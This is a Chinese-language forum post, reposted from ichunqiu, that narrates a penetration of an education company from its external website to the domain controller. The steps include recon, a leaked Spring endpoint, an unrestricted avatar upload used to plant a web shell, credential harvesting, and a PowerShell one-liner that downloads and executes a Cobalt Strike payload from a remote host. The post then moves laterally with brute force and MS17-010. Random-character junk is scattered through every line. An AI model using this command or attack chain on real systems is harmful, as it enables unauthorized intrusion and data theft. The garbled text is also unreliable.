|
9 g; ]. D+ d4 P7 I5 d2 ~6 c& C7 M 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
- u4 E% Z( W9 h0 Q5 \
( q6 s7 } Y( P2 T) R( T! D* U3 A& }0 n# i1 a; Q
# w. [5 Z* M$ p3 }
. ^. p6 j* l1 k$ G
' ?! N- l8 }; K6 g- n 正文7 X, g( J6 k# j- n
1 [2 U$ L- X' H- Y
# w# ` n2 K/ m( G5 B, e( h" f } 3 f; o+ c# P8 }2 Z7 q) q
5 R2 \& K. b( R9 R g9 e/ e6 f9 ^+ |" U/ C: D! C4 E
目标:www.xxxx.com(一家教育机构) ^6 G3 @% j; k& A4 S4 p
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能& b9 N1 I0 V8 I( x/ G
, p, h6 U: ^# }
7 X; x1 H3 `5 O( N7 T
' }4 e5 m) ]% G) v* l, m5 }
% a5 f" a4 U; ?! V3 `/ ?' L: ~: n% ^0 s
进行了简单的信息搜集
! E- y8 H, n6 Q3 s4 e; U 3 Q' e, F$ `: e2 K/ L2 k5 m) r
/ Z/ o1 u8 R, w; w
# j- S8 K1 p l, G
/ F# K. J# g" y% q/ g* T q# F3 e
子域名搜集
1 H; u+ L( c p2 d : `; ]7 r) i, l5 a, S3 M
{. G' g/ P" N. S; @! A
% ?) R3 @$ [8 G- }' ?, ]6 x/ f$ U& { # ]" F: v% p' ^7 x5 e: e
0 G5 _4 _8 i/ t( C, l
fofa找资产
d# r6 u# ~. u. ~" v( X : B$ O- o6 I; \, y( w1 m7 B
! ] B' g, K% _: [5 K. `
; ?0 i0 U) @( K, H; T
2 s9 }8 ]0 ~& T3 h4 t0 e* }
3 x( W8 A1 F+ x
5 l, t9 f/ ^5 A$ b3 L- k. N
) ]# |! P+ A. P
一共七个资产。去重之后只有两个。 2 Y5 x. b* j3 n
1 S8 w, x1 P% r: r: i' {4 }( E, B$ \
( z+ Y: \ V! O9 m6 H) h# [0 w
, u. `# n& M( U' o
Y7 Y. o9 ^7 b8 _ 目录探测8 N: M& R8 p4 H. p( L. Z
5 b, |9 [8 B5 Z' G* \8 ]! a0 _- O; x$ o4 u. [6 T% t
7 u6 |5 l/ @8 g% U3 W6 p
T9 t0 e' n6 ~5 E8 q; Q' T( {# Z- ]: t0 P/ p5 j
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
" }2 l% ~/ x" v/ W . K! P. j0 R" J H) j* X
4 N/ j) ]: _0 w5 u- \# J' h
9 \- X) {* X$ S/ ?: ^
# T! P, y: F' B- Y! r. t! i 我又尝试了通过修改返回包来绕过登录界面% O* G6 d! L1 X1 i6 s ^/ u0 C' z& p$ t
" K9 e6 a$ t3 n6 \
! ?$ ?9 _5 H& {" X' ` ) p/ c/ o" R. V) R* i c+ b
8 c4 O5 Y1 e% A5 M7 K5 G" l
+ n8 R, R: b6 L) D4 e H
还是不行,尝试注入无果; x7 h7 P6 I4 g
, ^$ e! a0 n; g* B P( m2 a3 t0 M% |( N0 ?2 ^
* G6 d% \* `7 L5 V9 A
6 W* F) S" V9 }# k* b/ |
7 L2 T" W8 u4 n* q) y, u/ }5 Q
不过我目录探测出了一处Spring信息泄露
9 F% N, g$ y! R5 T# Q# X9 G 0 x& H! K g. h4 P% c5 J
3 X6 J- `2 X4 f6 ?- F1 c
3 ?5 ^; {, ] y9 t" M- @
5 C p/ D% N# B+ [' R- D; l
: Y! ?! L8 d. ?% s3 c/ M . N8 j. L3 h4 J- `! H2 k, E
! j4 i0 O+ I" h. S 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
3 S! C- c" r2 e m, I
( z- p+ P8 n6 Y/ m* I2 \% C& Q; o; ~1 T+ X9 Z+ {! @. W
; d1 e3 |1 O$ K$ h8 V. y8 s & |# o& n( w T2 d
/ \6 x9 W3 w" Y' e7 A0 I, |; [
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
# u# S2 V! S4 b3 T o
( Q3 C3 w& S8 [8 G5 O* \4 `+ ?9 E& b5 N" K
1 z5 G2 e# F5 d$ | @
' {" {; `+ Z$ U( t9 x* U$ Y
( ^+ \5 D/ b O! h 获取有些师傅到这一步就手机抓包电脑测了。# T6 d5 X9 z4 _) `, a' u
9 }& b! X0 x; t) [
3 v {- r2 `$ |6 {8 ` Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
' h' z* G; Z2 J1 x! D 7 R1 I0 j5 O" w% W) e7 K& e. I/ Q
, P6 V' B" W" `1 p, I 其中在一个公众号发现了小程序,可以进行注册。. q- P" x6 o: C, I6 o% G# B
" I- j% c/ X$ @2 u$ Z
( c$ R2 Z( y4 Z 看到了头像上传,尝试上传获取WebShell4 B4 ?( w+ s3 K- l" j
8 l' F$ E, p8 t; Q s* Y* |) D; i+ Q, x' c# `% @7 S! k
' T9 b2 z6 |" O# ~
' |' ] f/ `% G) o0 p8 N4 V) g! {2 c. f8 p8 |. n' Q
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
4 o8 j {8 m# P; o/ S; Q 8 x1 \* x+ V: a( \/ C) }
6 f1 o3 p/ R f. Z+ U: _/ W+ y
5 E' R3 Z3 x' a/ k* o+ K 0 j- E/ U$ j/ x' A
( U. ~) x4 V0 A
然后上了大马( F s7 { W8 {
% i* s+ ]1 T: p& o4 d- r
- m; f* p8 C; g1 |) n5 q& B3 h v 9 x( k- p4 s( G5 N( b' J5 |
' n/ e% J" T6 Y: o& f# f1 G- a) @
: A; \5 s4 X8 g% G
K, r6 k* M8 c* m& N ; C! Z' g& o8 Q* i( U
4 A* R9 g: g1 i1 E/ j 通过翻找文件发现数据库账号密码# `. S0 e. |4 P3 f0 \1 x! m
( \2 s9 D; H6 q
3 l: S6 P7 @- M0 [; L
+ R9 c. Z/ `0 m) [& o; f/ f ! g9 k/ o6 e1 ~7 V& o+ x& y$ r
+ P/ H0 [! ]* I
--内网渗透7 _ _* r$ X) }3 p% J) g; e7 P
' _: o# @) q) l' x% e' n
+ A1 L% V1 T) h) R$ [5 U7 H' H6 h* ^ 直接通过powershell执行 cs上线7 \5 T# f/ f+ n2 d* o" r
/ }1 ~7 @( k* _5 Q _$ W4 G6 f x6 N% I' n
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
2 u" j0 O r7 z0 ~: h6 I: g/ ^( l & c: S3 ]6 I, o+ I/ \, C
# t$ \& A L( G% Z
# P* _: T" c& x1 x
7 A" Q7 M- L; M( c: M3 c( \
+ R2 R" ^2 Q5 c* W$ j9 w 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
8 Q' r' z- D4 ?- b7 I# I% Q6 R4 Z* B
1 n' ?$ S" i, \
- u+ b0 J# I7 {# [ , F) ?+ v |& x/ ^5 Z% L6 }
5 N3 K5 R. B. d0 _# B9 P1 V& |" [+ o# N; J% i! v n
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% e' r; K& Z r& q$ q; V
1 M: x8 O$ f4 M! j- i
$ Z c! A# X: _/ I: b4 F, |; f3 O# E; w* H. I
2 W8 R- Q! T' \' X3 Y; D$ j
2 {7 E8 c4 P e4 W6 W6 |
3 p9 j, t: B9 j1 D* ~6 Z- b2 L 7 A J0 ^5 a' h' @* @9 h! v
. E* t8 ~ ~& c" p8 C; V
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ q7 n! h3 O3 r& \" _* p 5 ^2 s- v( g4 c3 ~4 c q
/ g- t5 }& V& A
# g, n: `. E0 v% G9 G& j1 Q* `
6 s0 ]( Z5 z; A. p! c6 `2 ?9 g
- E& }) }/ t3 h; t( r! t 6 F1 M$ |: h+ W& h, a0 j2 |
& { R8 L$ F P* a6 o4 J
! l* S2 V1 c0 } & L; A u* x- P9 X n
4 j- z8 M' L F9 A+ K' w7 k: @
# T9 i" ~5 c0 ~% f" Q
( z" u( n8 y' ?: n
2 q% ^/ |, m5 Y- z, E/ X- L + v) c' }; T* N3 n2 h# l
3 ]; x7 Z. I$ b5 f3 |: M 小结
9 X; h6 W4 A! c
* `& z, g0 L4 j5 i6 f# {& H) |8 W2 d2 S- n( o
; d! q7 G" {, Z: }
@+ y$ c& N+ Y$ l( {. r7 a8 o0 J! s \1 u1 d# O4 y( {
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
% }: h+ W8 x3 r3 F% v, i 0 t3 g; \" _3 V
) p( u/ W# z1 X$ m8 T" v8 r6 R : [0 m; {' U% }, [/ {$ q
! _1 @6 P% H. P' ~/ I8 d9 _, I$ C1 B+ I) j1 y! ?! m& a7 Y* T: s% {9 u
-
" ]4 s1 m5 E6 R6 C6 h4 w
/ o) |9 n* O- b
5 Z; G9 u9 ^$ T -
; ~! ^* e# d9 u L0 Z, ?# A7 ^* A# N ; P0 b0 V+ [' o/ w$ G
8 z. X6 R4 J' y* D/ d2 y7 B & j! G* H1 l! J4 i
. W' P+ _! Z9 K9 u
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
}. g3 D% O# l7 |( k% D+ m
4 s' x' Z0 Z3 |7 }/ w5 q9 h
" `% b) ?3 c4 Z 2 j0 T# N8 u( F, r
|